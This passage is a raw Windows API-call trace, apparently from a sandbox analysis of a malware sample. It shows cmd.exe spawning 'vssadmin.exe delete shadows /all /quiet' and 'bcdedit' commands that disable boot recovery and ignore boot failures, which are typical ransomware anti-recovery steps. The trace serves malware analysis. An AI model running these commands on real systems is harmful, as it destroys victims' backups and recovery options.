lpNumberOfCharsWritten=0x28f690*=0xb) returned 1 [0190.501] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f69c | out: _Buffer=" /set {default} bootstatuspolicy ignoreallfailures ") returned 51 [0190.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.501] GetFileType (hFile=0x7) returned 0x2 [0190.501] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.501] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f65c | out: lpMode=0x28f65c) returned 1 [0190.501] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.501] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x28f688, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f688*=0x33) returned 1 [0190.502] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0190.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.502] GetFileType (hFile=0x7) returned 0x2 [0190.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.502] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0190.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.502] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0190.502] GetConsoleTitleW (in: lpConsoleTitle=0x28f228, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.502] GetFileAttributesW (lpFileName="cmd.exe" (normalized: "c:\\users\\eebsym5\\desktop\\cmd.exe")) returned 0xffffffff [0190.503] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0190.503] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0190.503] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0190.503] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0190.503] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0190.503] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0190.503] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0190.503] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 
[0190.503] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0190.503] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0190.503] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0190.503] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0190.503] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0190.503] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0190.503] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0190.503] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0190.503] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0190.503] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0190.503] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0190.503] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0190.503] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0190.503] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0190.503] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0190.504] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0190.504] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0190.525] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0190.525] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0190.525] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0190.525] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0190.525] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0190.525] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="REN") 
returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0190.525] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0190.525] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0190.525] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0190.525] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0190.525] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0190.525] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0190.525] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0190.525] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0190.525] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0190.525] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0190.525] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0190.525] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0190.525] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0190.525] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0190.525] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0190.525] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0190.525] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0190.526] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0190.526] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0190.526] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0190.526] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0190.526] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0190.526] _wcsicmp (_String1="cmd", 
_String2="FTYPE") returned -3 [0190.526] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0190.526] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0190.526] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0190.526] _wcsicmp (_String1="cmd", _String2="FOR") returned -3 [0190.526] _wcsicmp (_String1="cmd", _String2="IF") returned -6 [0190.526] _wcsicmp (_String1="cmd", _String2="REM") returned -15 [0190.526] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.526] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.526] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x28eae4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eae4) returned 0xffffffff [0190.526] GetLastError () returned 0x2 [0190.526] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\cmd.exe.*", fInfoLevelId=0x1, lpFindFileData=0x28eac4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac4) returned 0xffffffff [0190.527] GetLastError () returned 0x2 [0190.527] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x28eac4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac4) returned 0xffffffff [0190.527] GetLastError () returned 0x2 [0190.527] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x28eae4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eae4) returned 0x4921a8 [0190.527] FindClose (in: 
hFindFile=0x4921a8 | out: hFindFile=0x4921a8) returned 1 [0190.527] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0190.527] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0190.527] GetConsoleTitleW (in: lpConsoleTitle=0x28efbc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.527] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee44, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef0c | out: lpAttributeList=0x28ee44, lpSize=0x28ef0c) returned 1 [0190.527] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee44, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef04, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee44, lpPreviousValue=0x0) returned 1 [0190.527] GetStartupInfoW (in: lpStartupInfo=0x28ee00 | out: lpStartupInfo=0x28ee00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.527] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.527] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /C vssadmin.exe delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28eea0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cmd.exe /C vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28eeec | out: lpCommandLine="cmd.exe /C vssadmin.exe delete shadows 
/all /quiet ", lpProcessInformation=0x28eeec*(hProcess=0x58, hThread=0x54, dwProcessId=0x890, dwThreadId=0x85c)) returned 1 [0190.529] CloseHandle (hObject=0x54) returned 1 [0190.529] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.529] GetEnvironmentStringsW () returned 0x490940* [0190.529] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0190.529] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0193.923] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x28ede0 | out: lpExitCode=0x28ede0*=0x2) returned 1 [0193.923] CloseHandle (hObject=0x58) returned 1 [0193.924] _vsnwprintf (in: _Buffer=0x28ef28, _BufferCount=0x13, _Format="%08X", _ArgList=0x28edec | out: _Buffer="00000002") returned 8 [0193.924] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0193.924] GetEnvironmentStringsW () returned 0x490940* [0193.924] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0193.924] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.924] GetEnvironmentStringsW () returned 0x490940* [0193.924] FreeEnvironmentStringsW (penv=0x490940) returned 1 [0193.924] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee44 | out: lpAttributeList=0x28ee44) [0193.924] GetConsoleTitleW (in: lpConsoleTitle=0x28f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.924] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\eebsym5\\desktop\\bcdedit.exe")) returned 0xffffffff [0193.924] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0193.924] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0193.924] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0193.924] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0193.924] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0193.924] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0193.924] _wcsicmp (_String1="bcdedit", 
_String2="CHDIR") returned -1 [0193.924] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0193.924] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0193.924] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0193.924] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0193.924] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0193.925] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0193.925] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0193.925] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0193.925] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0193.925] _wcsicmp (_String1="bcdedit", 
_String2="MOVE") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0193.925] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0193.925] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0193.925] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0193.925] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0193.925] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0193.925] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0193.925] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0193.925] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0193.926] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0193.926] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0193.926] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0193.926] _wcsicmp (_String1="bcdedit", _String2="GOTO") 
returned -5 [0193.926] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0193.926] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0193.926] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0193.926] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0193.926] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0193.926] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0193.926] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0193.926] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0193.926] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0193.926] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0193.926] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0193.926] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0193.926] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0193.926] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0193.926] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0193.926] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0193.926] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0193.926] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0193.926] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0193.926] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0193.926] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0193.926] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0193.926] NeedCurrentDirectoryForExePathW 
(ExeName=".") returned 1 [0193.926] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0193.927] FindClose (in: hFindFile=0x490ba0 | out: hFindFile=0x490ba0) returned 1 [0193.927] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0193.927] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0193.927] GetConsoleTitleW (in: lpConsoleTitle=0x28ef58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0193.927] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ede0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28eea8 | out: lpAttributeList=0x28ede0, lpSize=0x28eea8) returned 1 [0193.927] UpdateProcThreadAttribute (in: lpAttributeList=0x28ede0, dwFlags=0x0, Attribute=0x60001, lpValue=0x28eea0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ede0, lpPreviousValue=0x0) returned 1 [0193.927] GetStartupInfoW (in: lpStartupInfo=0x28ed9c | out: lpStartupInfo=0x28ed9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0193.927] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0193.927] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee3c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit.exe /set {default} recoveryenabled no ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ee88 | out: lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessInformation=0x28ee88*(hProcess=0x54, hThread=0x58, dwProcessId=0xa5c, dwThreadId=0xa3c)) returned 1 [0194.736] CloseHandle (hObject=0x58) returned 1 [0194.737] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0194.737] GetEnvironmentStringsW () returned 0x4a0548* [0194.737] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0194.737] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0195.104] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ed7c | out: lpExitCode=0x28ed7c*=0x0) returned 1 [0195.104] CloseHandle (hObject=0x54) returned 1 [0195.104] _vsnwprintf (in: _Buffer=0x28eec4, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ed88 | out: _Buffer="00000000") returned 8 [0195.104] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.104] GetEnvironmentStringsW () returned 0x4a0548* [0195.104] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0195.104] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.104] GetEnvironmentStringsW () returned 0x4a0548* [0195.104] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0195.104] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ede0 | out: lpAttributeList=0x28ede0) [0195.104] GetConsoleTitleW (in: lpConsoleTitle=0x28f1c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.105] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\eebsym5\\desktop\\bcdedit.exe")) returned 0xffffffff [0195.105] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0195.105] 
_wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0195.105] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0195.105] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0195.105] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0195.105] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0195.105] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0195.105] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0195.105] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0195.105] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0195.105] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0195.105] _wcsicmp 
(_String1="bcdedit", _String2="START") returned -17 [0195.105] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0195.105] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0195.105] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0195.105] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0195.105] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0195.105] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0195.105] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0195.106] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0195.106] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0195.106] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0195.106] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0195.106] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0195.106] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0195.106] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0195.106] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0195.106] _wcsicmp (_String1="bcdedit", 